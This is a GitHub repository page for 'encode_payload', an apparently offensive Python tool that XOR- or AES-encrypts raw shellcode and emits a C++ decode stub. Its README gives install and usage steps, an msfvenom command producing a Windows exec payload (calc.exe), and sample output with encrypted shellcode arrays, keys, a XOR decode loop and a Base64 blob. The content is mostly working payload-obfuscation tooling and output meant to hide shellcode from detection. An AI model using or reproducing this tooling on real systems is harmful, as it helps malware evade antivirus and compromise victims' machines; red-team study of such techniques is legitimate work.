Skip to content
/ encode_payload Public

Creates C++ Stub with XOR/AES encode shellcode. Includes Decode stub. Also includes XOR/AES + Base64.

6 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0xflagplz/encode_payload

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

25 Commits
README.md
README.md
 
 
decode-XOR_AES.cpp
decode-XOR_AES.cpp
 
 
encode.py
encode.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Installation

Python 2.7

git clone https://github.com/AchocolatechipPancake/encode_payload.git
sudo apt update
sudo apt install python-pip
pip2 install -r requirements

##Get encryption output for payload via key

takes bin payload encode with provided key. C++ function to decode

(Python2) Execution Examples:

python encode.py shellcodefile key

python encode.py poc.raw 12345

python encode.py poc.bin sa89ydsa

#Output Example:

msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o file.bin

python encode.py file.bin 123abc

[*] Shellcode file [file.bin] successfully loaded
[*] MD5 hash of the initial shellcode: [f0d4c2f27ad22bd89f443ad65711d49f]
[*] Original Shellcode size: [276] bytes


[*] Add the following to C++ code file

==================================== XOR C++ Code ====================================

[*] XOR encoding the shellcode with key [123abc]
char encryptedShellcode[] = "\xcd\x7a\xb0\x85\x92\x8b\xf1\x32\x33\x61\x23\x32\x70\x62\x61\x30\x34\x2b\x00\xe0\x56\x29\xe9\x31\x51\x7a\xb8\x33\x7a\x2b\xba\x60\x13\x29\xe9\x11\x61\x7a\x3c\xd6\x28\x29\x7c\x03\xfa\x29\x53\xa3\x9d\x0e\x52\x1d\x60\x4f\x11\x73\xf2\xa8\x6f\x22\x30\xf3\xd1\x8c\x30\x22\x60\x7a\xb8\x33\x42\xe8\x73\x0e\x7b\x60\xb2\xe8\xb1\xba\x33\x61\x62\x2b\xb4\xf2\x47\x06\x2a\x62\xe1\x62\xb8\x29\x7a\x27\xba\x72\x13\x28\x63\xb3\xd2\x64\x7b\x9e\xab\x22\xba\x06\xbb\x29\x63\xb5\x7c\x03\xfa\x29\x53\xa3\x9d\x73\xf2\xa8\x6f\x22\x30\xf3\x0b\x81\x17\x92\x7d\x31\x7f\x45\x6a\x26\x08\xe3\x46\xb9\x3a\x27\xba\x72\x17\x28\x63\xb3\x57\x73\xb8\x6d\x2a\x27\xba\x72\x2f\x28\x63\xb3\x70\xb9\x37\xe9\x2a\x62\xe1\x73\x6b\x20\x3a\x3d\x68\x68\x72\x39\x23\x3a\x70\x68\x7b\xe2\x8e\x43\x70\x60\xcc\x81\x3a\x22\x68\x68\x7b\xea\x70\x8a\x66\xcd\xcc\x9e\x3f\x2b\x8b\x33\x33\x61\x62\x63\x31\x32\x33\x29\xef\xee\x30\x33\x33\x61\x23\xd9\x00\xb9\x5c\xe6\x9d\xb6\x8a\xc2\x86\xc3\x34\x22\x8b\x94\xa6\xdc\xff\x9c\xe4\x7a\xb0\xa5\x4a\x5f\x37\x4e\x39\xe1\x99\x83\x44\x37\x88\x26\x71\x11\x5e\x58\x33\x38\x23\xea\xeb\xcd\xe6\x02\x03\x0f\x52\x1c\x56\x19\x07\x63";
char key[] = "123abc";
char cipherType[] = "xor";

[*] Encrypted XOR shellcode size: [276] bytes

==================================== AES C++ Code ====================================

[*] AES encrypting the shellcode with 128 bits derived key [a8EWkYTZn0qK/2xhh/mRTQ==]
char encryptedShellcode[] = "\x78\xaf\x84\x96\x3c\xe1\x90\x72\x6d\x58\x2b\xe6\x0f\x49\x91\x78\xc4\x91\x69\xfd\xb1\x66\xfa\x71\x98\x11\x61\x25\x23\x34\x6b\x6d\x6d\x92\x94\x3c\x1f\x80\x7e\x4d\x20\x1b\x7a\x51\x14\x37\x4f\xe1\xa5\x5d\x1d\x98\xf5\xc4\xe8\xc2\x07\xb9\x47\x1e\xa7\xbc\xeb\x4b\xa1\xbf\x15\x36\x99\xaf\x4f\x31\x90\x63\xda\x02\xe0\x30\x73\xfd\xea\xdf\x53\x76\x27\xdf\xbb\x74\x93\xbf\xa7\xfd\x6b\x75\x9a\x61\x29\x8d\x10\x2b\x4f\x21\xbe\xfa\x42\x2d\xdb\xfa\x07\x5b\xdd\xa1\x23\xd3\x4d\xaf\x8c\x65\xe6\x26\x34\x23\x84\xf1\xb0\x19\x37\x5b\xf2\x77\x16\xe9\xd1\x61\x61\x7a\xe8\xe7\x09\x5b\x38\xb9\xff\x09\x7e\xa1\x0f\xa5\xfb\xa6\x78\x5d\xcf\x61\x7b\x4e\x12\x3c\x65\x29\x10\x8f\x1f\x7b\x70\x0b\xd4\x99\xc6\xfc\xef\x99\xec\x8d\x65\xd5\xb2\x35\x41\xec\x8b\xc2\x30\x2c\xf5\x51\xc0\x48\xb2\x9f\x2b\xdb\x80\x52\xf0\x42\xc3\x60\xdd\x97\x03\x03\xa6\x60\x8c\x22\xeb\x2a\x7b\xdc\x30\x36\x42\xfd\xca\xdd\xd2\x93\x74\xdd\x27\x80\xe6\x8c\xd1\xb4\x1a\xb5\xeb\x02\xda\xfa\xc9\x9f\xc1\x3f\x9c\x20\xd3\xbd\x4d\x6d\x23\x37\x2f\x9d\x91\x10\xe4\xb4\x1d\x28\x40\x53\x67\xef\x1f\x66\x66\x88\x07\x8e\x0d\xe2\xf5\x0a\xa0\x0b\xe1\x82\xdc\xce\xa8\x58\x21\x94\x5e\x95\xc2\xca\x4c\xed\xcc\x7e\x5e\x80\x69\xb1\xd3\x87\x26\xab\x16\x7b\x32\xd9\x91\xc5\xe1\xf7\x8a\x31\x1f\x8f";
char key[] = "a8EWkYTZn0qK/2xhh/mRTQ==";
char cipherType[] = "aes";

[*] Encrypted AES shellcode size: [304] bytes


================================= C++ Decrypt Code =================================

int j = 0;

for (int i = 0; i < sizeof encryptedShellcode; i++) {

     if (j == sizeof key - 1) j = 0;

     shellcode[i] = encryptedShellcode[i] ^ key[j];

     j++;

}


============================= Base64 String =============================

eK+EljzhkHJtWCvmD0mReMSRaf2xZvpxmBFhJSM0a21tkpQ8H4B+TSAbelEUN0/hpV0dmPXE6MIHuUcep7zrS6G/FTaZr08xkGPaAuAwc/3q31N2J9+7dJO/p/1rdZphKY0QK08hvvpCLdv6B1vdoSPTTa+MZeYmNCOE8bAZN1vydxbp0WFheujnCVs4uf8JfqEPpfumeF3PYXtOEjxlKRCPH3twC9SZxvzvmeyNZdWyNUHsi8IwLPVRwEiynyvbgFLwQsNg3ZcDA6ZgjCLrKnvcMDZC/crd0pN03SeA5ozRtBq16wLa+smfwT+cINO9TW0jNy+dkRDktB0oQFNn7x9mZogHjg3i9QqgC+GC3M6oWCGUXpXCykztzH5egGmx04cmqxZ7MtmRxeH3ijEfjw==

About

Creates C++ Stub with XOR/AES encode shellcode. Includes Decode stub. Also includes XOR/AES + Base64.

Resources

Readme
Activity

Stars

6 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages